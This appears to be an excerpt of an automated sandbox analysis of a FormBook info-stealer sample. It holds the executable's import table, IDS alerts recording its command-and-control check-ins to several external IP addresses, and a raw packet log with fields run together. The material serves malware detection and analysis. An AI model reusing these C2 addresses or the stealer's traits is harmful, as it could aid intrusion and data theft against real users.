                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                    UxTheme.dllIsThemeActive
                                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, 
GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T08:15:40.434176+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50008 | 104.21.42.77 | 80 | TCP
2025-01-11T08:16:42.756658+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49972 | 154.205.156.26 | 80 | TCP
2025-01-11T08:16:59.497328+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49973 | 47.76.213.197 | 80 | TCP
2025-01-11T08:17:02.081515+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49974 | 47.76.213.197 | 80 | TCP
2025-01-11T08:17:04.638978+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49976 | 47.76.213.197 | 80 | TCP
2025-01-11T08:17:07.189292+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49977 | 47.76.213.197 | 80 | TCP
2025-01-11T08:17:13.306462+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49978 | 74.48.143.82 | 80 | TCP
2025-01-11T08:17:15.868025+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49979 | 74.48.143.82 | 80 | TCP
2025-01-11T08:17:18.395884+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49980 | 74.48.143.82 | 80 | TCP
2025-01-11T08:17:20.955304+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49981 | 74.48.143.82 | 80 | TCP
2025-01-11T08:17:26.456079+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49982 | 13.248.169.48 | 80 | TCP
2025-01-11T08:17:29.005833+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49983 | 13.248.169.48 | 80 | TCP
2025-01-11T08:17:31.571928+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49984 | 13.248.169.48 | 80 | TCP
2025-01-11T08:17:34.104111+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49985 | 13.248.169.48 | 80 | TCP
2025-01-11T08:17:40.319273+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49986 | 103.21.221.87 | 80 | TCP
2025-01-11T08:17:42.840779+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49987 | 103.21.221.87 | 80 | TCP
2025-01-11T08:17:45.392008+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49988 | 103.21.221.87 | 80 | TCP
2025-01-11T08:17:48.016406+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49989 | 103.21.221.87 | 80 | TCP
2025-01-11T08:17:54.627543+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49990 | 8.218.14.120 | 80 | TCP
2025-01-11T08:17:57.228314+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49991 | 8.218.14.120 | 80 | TCP
2025-01-11T08:17:59.919440+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49992 | 8.218.14.120 | 80 | TCP
2025-01-11T08:18:02.476469+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49993 | 8.218.14.120 | 80 | TCP
2025-01-11T08:18:08.097844+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49994 | 203.161.43.228 | 80 | TCP
2025-01-11T08:18:10.670064+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49995 | 203.161.43.228 | 80 | TCP
2025-01-11T08:18:13.227092+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49996 | 203.161.43.228 | 80 | TCP
2025-01-11T08:18:15.759713+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49997 | 203.161.43.228 | 80 | TCP
2025-01-11T08:18:21.267075+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49998 | 13.248.169.48 | 80 | TCP
2025-01-11T08:18:23.809027+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49999 | 13.248.169.48 | 80 | TCP
2025-01-11T08:18:26.381532+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50000 | 13.248.169.48 | 80 | TCP
2025-01-11T08:18:28.913120+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 50001 | 13.248.169.48 | 80 | TCP
2025-01-11T08:18:35.081560+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50002 | 147.255.21.187 | 80 | TCP
2025-01-11T08:18:37.633844+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50003 | 147.255.21.187 | 80 | TCP
2025-01-11T08:18:40.173449+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50004 | 147.255.21.187 | 80 | TCP
2025-01-11T08:18:42.699338+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 50005 | 147.255.21.187 | 80 | TCP
2025-01-11T08:18:49.281777+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50006 | 104.21.42.77 | 80 | TCP
2025-01-11T08:18:51.841588+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50007 | 104.21.42.77 | 80 | TCP
                                                                    Jan 11, 2025 08:17:54.627398968 CET80499908.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:54.627542973 CET4999080192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:55.262913942 CET4999080192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:56.333071947 CET4999180192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:56.338093042 CET80499918.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:56.338258982 CET4999180192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:56.477174997 CET4999180192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:56.482141018 CET80499918.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:57.228091002 CET80499918.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:57.228255033 CET80499918.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:57.228313923 CET4999180192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:57.981693029 CET4999180192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:59.016417980 CET4999280192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:59.021482944 CET80499928.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:59.021575928 CET4999280192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:59.051192999 CET4999280192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:59.056221962 CET80499928.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:59.056288958 CET80499928.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:59.919323921 CET80499928.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:59.919352055 CET80499928.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:59.919440031 CET4999280192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:18:00.559870005 CET4999280192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:18:01.578720093 CET4999380192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:18:01.583621979 CET80499938.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:18:01.583715916 CET4999380192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:18:01.593446970 CET4999380192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:18:01.598299980 CET80499938.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:18:02.476223946 CET80499938.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:18:02.476265907 CET80499938.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:18:02.476469040 CET4999380192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:18:02.479099035 CET4999380192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:18:02.483993053 CET80499938.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:18:07.499998093 CET4999480192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:07.504822016 CET8049994203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:07.504929066 CET4999480192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:07.520422935 CET4999480192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:07.525248051 CET8049994203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:08.097700119 CET8049994203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:08.097749949 CET8049994203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:08.097843885 CET4999480192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:09.028676987 CET4999480192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:10.047323942 CET4999580192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:10.052664042 CET8049995203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:10.052757025 CET4999580192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:10.068294048 CET4999580192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:10.073271990 CET8049995203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:10.669715881 CET8049995203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:10.669955969 CET8049995203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:10.670063972 CET4999580192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:11.575432062 CET4999580192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:12.594139099 CET4999680192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:12.599030018 CET8049996203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:12.599159002 CET4999680192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:12.615262985 CET4999680192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:12.620203972 CET8049996203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:12.620306015 CET8049996203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:13.226315022 CET8049996203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:13.227020025 CET8049996203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:13.227092028 CET4999680192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:14.122298002 CET4999680192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:15.141362906 CET4999780192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:15.146302938 CET8049997203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:15.146481991 CET4999780192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:15.156759977 CET4999780192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:15.161714077 CET8049997203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:15.759304047 CET8049997203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:15.759443045 CET8049997203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:15.759712934 CET4999780192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:15.762191057 CET4999780192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:15.767066002 CET8049997203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:20.790323019 CET4999880192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:20.795336008 CET804999813.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:20.795447111 CET4999880192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:20.810429096 CET4999880192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:20.815409899 CET804999813.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:21.266819954 CET804999813.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:21.266949892 CET804999813.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:21.267075062 CET4999880192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:22.325561047 CET4999880192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:23.344351053 CET4999980192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:23.351661921 CET804999913.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:23.351789951 CET4999980192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:23.367479086 CET4999980192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:23.372359037 CET804999913.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:23.808835983 CET804999913.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:23.808896065 CET804999913.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:23.809026957 CET4999980192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:24.872384071 CET4999980192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:25.892127991 CET5000080192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:25.897181988 CET805000013.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:25.897334099 CET5000080192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:25.913553953 CET5000080192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:25.918644905 CET805000013.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:25.918791056 CET805000013.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:26.381391048 CET805000013.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:26.381450891 CET805000013.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:26.381531954 CET5000080192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:27.419596910 CET5000080192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:28.437974930 CET5000180192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:28.443068027 CET805000113.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:28.443197012 CET5000180192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:28.453018904 CET5000180192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:28.457828999 CET805000113.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:28.912782907 CET805000113.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:28.912861109 CET805000113.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:28.913120031 CET5000180192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:28.915714025 CET5000180192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:28.920644045 CET805000113.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:34.473964930 CET5000280192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:34.478782892 CET8050002147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:34.478880882 CET5000280192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:34.494033098 CET5000280192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:34.498816967 CET8050002147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:35.081433058 CET8050002147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:35.081456900 CET8050002147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:35.081559896 CET5000280192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:35.997405052 CET5000280192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:37.016028881 CET5000380192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:37.022555113 CET8050003147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:37.022703886 CET5000380192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:37.038695097 CET5000380192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:37.045150995 CET8050003147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:37.633712053 CET8050003147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:37.633738995 CET8050003147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:37.633843899 CET5000380192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:38.544375896 CET5000380192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:39.563002110 CET5000480192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:39.568142891 CET8050004147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:39.568304062 CET5000480192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:39.584207058 CET5000480192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:39.589138985 CET8050004147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:39.589193106 CET8050004147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:40.173273087 CET8050004147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:40.173382044 CET8050004147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:40.173449039 CET5000480192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:41.093058109 CET5000480192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:42.112834930 CET5000580192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:42.117789984 CET8050005147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:42.117929935 CET5000580192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:42.128494978 CET5000580192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:42.133369923 CET8050005147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:42.698919058 CET8050005147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:42.699007034 CET8050005147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:42.699337959 CET5000580192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:42.703228951 CET5000580192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:42.708076000 CET8050005147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:47.741822004 CET5000680192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:47.746681929 CET8050006104.21.42.77192.168.2.7
                                                                    Jan 11, 2025 08:18:47.746750116 CET5000680192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:47.764175892 CET5000680192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:47.769011974 CET8050006104.21.42.77192.168.2.7
